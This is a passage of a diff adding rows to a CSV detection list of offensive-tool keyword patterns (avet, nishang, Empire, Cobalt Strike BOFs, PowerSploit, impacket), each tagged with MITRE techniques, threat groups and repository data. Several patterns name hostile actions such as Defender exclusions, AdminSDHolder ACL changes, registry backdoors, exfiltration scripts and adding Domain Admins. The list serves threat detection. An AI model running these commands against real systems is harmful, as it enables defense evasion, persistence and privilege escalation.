have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*add_evasion has_username *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*add_evasion has_vm_mac*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*add_evasion has_vm_regkey*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*add_evasion hide_console*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*add_evasion interaction_getchar*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*add_evasion interaction_system_pause*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*add_evasion is_debugger_present*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*add_evasion sleep_by_ping *","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*Add_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*addcomputer.py -computer-name * -computer-pass * -dc-host * -domain-netbios *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*addcomputer.py -delete -computer-name * -dc-host * -domain-netbios *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*addcomputer.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*Add-ConstrainedDelegationBackdoor*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Add-Exfiltration.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*Add-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z"
+"*AddKeePassTrigger.ps1*","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*AddKeePassTrigger.ps1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*Add-MpPreference -ExclusionPath *","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Add-MpPreference -ExclusionProcess *\Windows\System32\WindowsPowerShell\v1.0\powershell.exe*","greyware_tool_keyword","powershell","Exclude powershell from defender detections","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
+"*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights All*","offensive_tool_keyword","powerview","modifying existing permissions on an Active 
Directory object ('AdminSDHolder'). which can be used to maintain unauthorized access or escalate privileges in the targeted environment. The 'AdminSDHolder' container plays a crucial role in managing the security of protected groups in Active Directory. and modifying its permissions may lead to unintended security consequences.","T1222","TA0003","N/A","N/A","Persistence","https://github.com/zloeber/PSAD/blob/master/src/inprogress/Add-ObjectACL.ps1","1","0","N/A","N/A","1","15","2","2017-10-26T20:35:53Z","2017-07-07T13:34:07Z"
+"*Add-Persistence *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Add-Persistence*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Add-Persistence.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*addpriv SeloadDrivePrivilege*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Add-PSFirewallRules*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Add-PswaAuthorizationRule -UsernName \* -ComputerName \* -ConfigurationName \*","greyware_tool_keyword","powershell","allows all users to access all computers with a specified configuration","T1053","TA0003","N/A","N/A","Persistence","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Add-RegBackdoor.ps1*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" 
+"*Add-RemoteRegBackdoor*","offensive_tool_keyword","AD exploitation cheat sheet","Using DAMP toolkit We add the backdoor using the Add-RemoteRegBackdoor.ps1 cmdlet from DAMP.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Add-RemoteRegBackdoor*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
+"*addresshunter.h*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*Add-ServiceDacl *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*Add-ServiceDacl*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*addspn.py -u * -p * -t * -s * --additional *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*addspn.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z"
+"*AddUser-Bof.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z"
+"*AddUser-Bof.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z"
+"*AddUser-Bof.o*","offensive_tool_keyword","cobaltstrike","Cobalt 
Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z"
+"*AddUser-Bof.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z"
+"*AddUser-Bof.x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z"
+"*AddUserImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*AddUserToDomainGroup *Domain Admins*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","0","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z"
+"*AddUserToDomainGroup.*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z"
+"*AddUserToDomainGroup.cna*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
